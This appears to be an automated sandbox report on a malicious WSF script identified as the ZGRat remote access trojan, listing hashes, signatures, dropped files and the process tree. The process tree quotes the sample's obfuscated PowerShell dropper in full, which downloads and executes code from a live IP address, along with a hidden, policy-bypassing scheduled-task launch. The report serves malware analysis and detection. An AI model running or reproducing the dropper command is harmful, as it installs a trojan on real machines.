Resubmissions

25/01/2024, 11:33

240125-nn2hksffbq 10

Analysis

  • max time kernel
    140s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/01/2024, 11:33

General

  • Target

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf

  • Size

    144KB

  • MD5

    d98237f1eb423d002ec4431002532420

  • SHA1

    3c03b0e124cf15312a0cf43e1a74a3827b027e29

  • SHA256

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

  • SHA512

    9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f

  • SSDEEP

    3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs (ps1.dropper)
    http://185.81.157.103/96/1.txt

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLK
JIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaU
TSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\hich.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2184

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize
    7KB
    MD5
    615a7b1b6cd63e8be3b318138ff66688
    SHA1
    f0fb5b11ff93a7448a158b2345737fd336c6893d
    SHA256
    b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c
    SHA512
    19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp
    Filesize
    7KB
    MD5
    e32cad1ab4c8a3ad44873e572ee4dc01
    SHA1
    d0bf141a980383e56b523ccf0203ae37151ab10f
    SHA256
    ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6
    SHA512
    aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c

  • C:\Users\Public\hich.bat
    Filesize
    195B
    MD5
    6c8a34a94e068b809145df09acbe153c
    SHA1
    0ec5c6964c6ccc949af47297eb9794f8f1ee4724
    SHA256
    c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
    SHA512
    41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

  • C:\Users\Public\hich.ps1
    Filesize
    370KB
    MD5
    7cc8cf044a1603d177667066b558742b
    SHA1
    822b16d67f89023109a2fb8a091c7949f7fb3bc4
    SHA256
    3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19
    SHA512
    28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175

  • C:\Users\Public\hich.vbs
    Filesize
    686B
    MD5
    741b5b0a474f0e0cd28fd880f68723c0
    SHA1
    4de5489c4e56882514b3ab432048200eae65f90d
    SHA256
    f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
    SHA512
    3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

  • memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
    Filesize
    9.6MB
  • memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp
    Filesize
    512KB
  • memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp
    Filesize
    512KB
  • memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
    Filesize
    9.6MB
  • memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp
    Filesize
    208KB
  • memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp
    Filesize
    512KB
  • memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp
    Filesize
    9.6MB
  • memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
    Filesize
    2.9MB
  • memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp
    Filesize
    512KB
  • memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp
    Filesize
    32KB
  • memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp
    Filesize
    512KB
  • memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp
    Filesize
    512KB
  • memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
    Filesize
    9.6MB
  • memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp
    Filesize
    2.9MB
  • memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp
    Filesize
    32KB
  • memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
    Filesize
    9.6MB
  • memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp
    Filesize
    512KB
  • memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp
    Filesize
    512KB
  • memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
    Filesize
    9.6MB